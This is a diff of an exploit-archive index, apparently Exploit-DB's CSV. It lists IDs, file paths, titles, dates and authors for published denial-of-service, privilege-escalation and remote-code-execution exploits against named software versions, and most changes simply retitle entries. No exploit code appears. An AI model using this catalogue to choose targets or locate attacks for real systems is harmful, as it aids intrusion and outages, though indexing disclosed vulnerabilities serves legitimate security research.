17642,exploits/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,dos,windows,
17643,exploits/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,dos,windows,
17658,exploits/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive",2011-08-12,G13,dos,windows,
17664,exploits/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,dos,windows,
17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,dos,windows,
17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC)",2011-08-17,0in,dos,windows,
17696,exploits/multiple/dos/17696.pl,"Apache - Remote Memory Exhaustion (Denial of Service)",2011-08-19,kingcope,dos,multiple,
17712,exploits/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",dos,windows,
17718,exploits/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",dos,windows,
@ -2137,7 +2137,7 @@ id,file,description,date,author,type,platform,port
18460,exploits/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",dos,php,
18461,exploits/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)",2012-02-04,"Senator of Pirates",dos,windows,
18463,exploits/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",dos,windows,
18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",dos,windows,
18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",dos,windows,
18475,exploits/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death",2012-02-09,shinnai,dos,windows,
18481,exploits/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",dos,windows,
18488,exploits/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",dos,windows,8300
@ -2429,9 +2429,9 @@ id,file,description,date,author,type,platform,port
20094,exploits/windows/dos/20094.txt,"NullSoft Winamp 2.64 - '.m3u' Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",dos,windows,
20098,exploits/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",dos,multiple,
20099,exploits/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,dos,windows,
20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",dos,windows,
20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service",2000-07-21,"Blue Panda",dos,windows,
20101,exploits/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",dos,windows,
20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows,
20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows,
43147,exploits/hardware/dos/43147.sh,"D-Link DIR-605L < 2.08 - Denial of Service",2017-11-14,"Enrique Castillo",dos,hardware,
20167,exploits/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,dos,linux,
20175,exploits/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",dos,windows,
@ -2606,7 +2606,7 @@ id,file,description,date,author,type,platform,port
21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple,
21224,exploits/linux_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,linux_x86-64,
21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows,
21232,exploits/multiple/dos/21232.c,"Oracle 8i - dbsnmp Command Remote Denial of Service",2002-01-17,benjurry,dos,multiple,
21232,exploits/multiple/dos/21232.c,"Oracle 8i - 'dbsnmp' Remote Denial of Service",2002-01-17,benjurry,dos,multiple,
21234,exploits/osx/dos/21234.sh,"Netopia Timbuktu Pro for Macintosh 6.0.1 - Denial of Service",2002-01-18,"Tekno pHReak",dos,osx,
21236,exploits/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",dos,unix,
21237,exploits/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",dos,windows,
@ -2755,7 +2755,7 @@ id,file,description,date,author,type,platform,port
22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix,
22074,exploits/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,dos,osx,
22079,exploits/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",dos,linux,
22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",dos,windows,
22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow",2002-12-09,"Tamer Sahin",dos,windows,
22100,exploits/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",dos,windows,
22105,exploits/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",dos,linux,
22110,exploits/php/dos/22110.txt,"PHP-Nuke 6.0 - 'modules.php' Denial of Service",2002-12-23,"Ing. Bernardo Lopez",dos,php,
@ -2902,7 +2902,7 @@ id,file,description,date,author,type,platform,port
22780,exploits/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",dos,windows,
22788,exploits/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,dos,windows,
22789,exploits/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,dos,windows,
22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,dos,windows,
22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - 'CWD' Denial of Service",2003-05-12,dr_insane,dos,windows,
22794,exploits/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of Service",2003-06-17,dr_insane,dos,windows,
22796,exploits/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",dos,linux,
22797,exploits/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",dos,hardware,
@ -3048,7 +3048,7 @@ id,file,description,date,author,type,platform,port
23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,dos,osx,
23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,dos,multiple,
23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",dos,php,
23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,dos,windows,
23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows,
23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,dos,windows,
23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)",2003-12-26,"decka trash",dos,windows,
23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",dos,windows,
@ -3104,13 +3104,13 @@ id,file,description,date,author,type,platform,port
23715,exploits/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,dos,windows,
23716,exploits/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",dos,windows,
23731,exploits/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",dos,windows,
23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",dos,php,
23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Denial of Service",2004-02-24,"Zone-h Security Team",dos,php,
23752,exploits/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,windows,
23755,exploits/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,multiple,
23757,exploits/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,linux,
23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,dos,windows,
23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,dos,windows,
23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,dos,windows,
23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,dos,windows,
23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,dos,windows,
23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,dos,windows,
23769,exploits/windows/dos/23769.pl,"ArGoSoft FTP Server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",dos,windows,
23778,exploits/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",dos,hardware,
23779,exploits/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",dos,linux,
@ -3295,7 +3295,7 @@ id,file,description,date,author,type,platform,port
24809,exploits/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,dos,multiple,
24815,exploits/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",dos,linux,
24818,exploits/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",dos,multiple,
24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",dos,linux,
24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution",2004-12-13,"Giovanni Delvecchio",dos,linux,
24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware,
24841,exploits/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String",2004-12-14,"Greg MacManus",dos,windows,
24843,exploits/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,dos,osx,
@ -3585,7 +3585,7 @@ id,file,description,date,author,type,platform,port
28087,exploits/windows/dos/28087.txt,"Microsoft Office 2003 - Embedded Shockwave Flash Object Security Bypass",2006-06-22,"Debasis Mohanty",dos,windows,
28099,exploits/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",dos,windows,
28100,exploits/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",dos,cfm,
28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,dos,windows,
28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP 'HELO' Remote Denial of Service",2006-06-24,db0,dos,windows,
28135,exploits/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",dos,osx,
28144,exploits/windows/dos/28144.txt,"Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,dos,windows,
28145,exploits/windows/dos/28145.html,"Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,dos,windows,
@ -3703,7 +3703,7 @@ id,file,description,date,author,type,platform,port
29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",dos,windows,
29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,dos,windows,
29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",dos,linux,
29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",dos,windows,
29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
@ -3778,7 +3778,7 @@ id,file,description,date,author,type,platform,port
29743,exploits/windows/dos/29743.txt,"Symantec 'SYMTDI.SYS' Device Driver - Local Denial of Service",2007-03-15,"David Matousek",dos,windows,
29767,exploits/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",dos,hardware,
29781,exploits/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",dos,linux,
29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,dos,windows,
29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - 'RERT' Denial of Service",2007-01-18,Handrix,dos,windows,
30110,exploits/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow (Denial of Service) (PoC)",2007-05-31,"Tavis Ormandy",dos,linux,
30139,exploits/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",dos,multiple,
30160,exploits/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service",2007-06-06,"Dennis Rand",dos,windows,
@ -3870,7 +3870,7 @@ id,file,description,date,author,type,platform,port
30592,exploits/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",dos,multiple,
30593,exploits/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",dos,windows,
30619,exploits/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial of Service",2007-07-26,"Xavier Roche",dos,windows,
30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",dos,windows,
30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow",2007-10-01,"Luigi Auriemma",dos,windows,
30644,exploits/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",dos,multiple,
30646,exploits/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",dos,linux,
30648,exploits/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,dos,linux,
@ -3949,7 +3949,7 @@ id,file,description,date,author,type,platform,port
31271,exploits/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",dos,multiple,
31203,exploits/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",dos,multiple,
31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,dos,windows,
31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux,
31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux,
31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,dos,linux,
31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows,
31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,dos,multiple,
@ -4062,7 +4062,7 @@ id,file,description,date,author,type,platform,port
32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple,
32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple,
32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple,
32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple,
32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",dos,multiple,
32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows,
@ -4348,7 +4348,7 @@ id,file,description,date,author,type,platform,port
34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",dos,linux,
34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)",2010-08-03,"Rodrigo Escobar",dos,hardware,
34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",dos,windows,
34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,dos,windows,
34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",dos,linux,
34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",dos,windows,
@ -4632,8 +4632,8 @@ id,file,description,date,author,type,platform,port
37763,exploits/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service",2015-08-12,Un_N0n,dos,windows,
37764,exploits/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",dos,windows,
37766,exploits/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",dos,multiple,
37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service",2015-08-15,St0rn,dos,windows,
37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,dos,windows,
37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service",2015-08-15,St0rn,dos,windows,
37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service",2015-08-15,St0rn,dos,windows,
37777,exploits/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",dos,linux,
37783,exploits/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",dos,linux,
38001,exploits/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,dos,windows,22
@ -6094,7 +6094,7 @@ id,file,description,date,author,type,platform,port
288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,
290,exploits/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation",2001-03-04,Shadow,local,linux,
302,exploits/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,local,unix,
317,exploits/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",local,linux,
317,exploits/linux/local/317.txt,"Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution",1996-01-01,"Jared Mauch",local,linux,
319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux,
320,exploits/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",local,linux,
321,exploits/multiple/local/321.c,"BSD / Linux - 'umount' Local Privilege Escalation",1996-08-13,bloodmask,local,multiple,
@ -8391,7 +8391,7 @@ id,file,description,date,author,type,platform,port
22615,exploits/freebsd/local/22615.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (3)",2003-05-20,CMN,local,freebsd,
22616,exploits/linux/local/22616.pl,"Maelstrom Player 3.0.x - Argument Buffer Overflow (1)",2003-05-21,"Luca Ercoli",local,linux,
22617,exploits/linux/local/22617.c,"Maelstrom Player 3.0.x - Argument Buffer Overflow (2)",2003-05-20,knight420,local,linux,
22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",local,multiple,
22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution",2003-03-20,"Tomasz Grabowski",local,multiple,
22633,exploits/linux/local/22633.c,"Polymorph 0.4 - Filename Buffer Overflow",2003-05-22,demz,local,linux,
22640,exploits/linux/local/22640.c,"UML_NET - Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,local,linux,
22643,exploits/linux/local/22643.pl,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (1)",2003-05-26,jlanthea,local,linux,
@ -11384,7 +11384,7 @@ id,file,description,date,author,type,platform,port
14875,exploits/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",remote,multiple,
14886,exploits/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,remote,windows,
14878,exploits/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,remote,windows,
14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,remote,windows,
14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution",2010-11-17,Dr_IDE,remote,windows,
14895,exploits/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,remote,windows,
14925,exploits/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,remote,linux,
14941,exploits/windows_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",remote,windows_x86,80
@ -11469,7 +11469,7 @@ id,file,description,date,author,type,platform,port
15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",remote,windows,
15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (MS11-002)",2011-01-12,"Peter Vreugdenhil",remote,windows,
16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,remote,windows,
16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,remote,multiple,
16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",remote,windows,
16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",remote,windows,
@ -11845,7 +11845,7 @@ id,file,description,date,author,type,platform,port
16708,exploits/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
16709,exploits/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows,
16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)",2011-02-23,Metasploit,remote,windows,
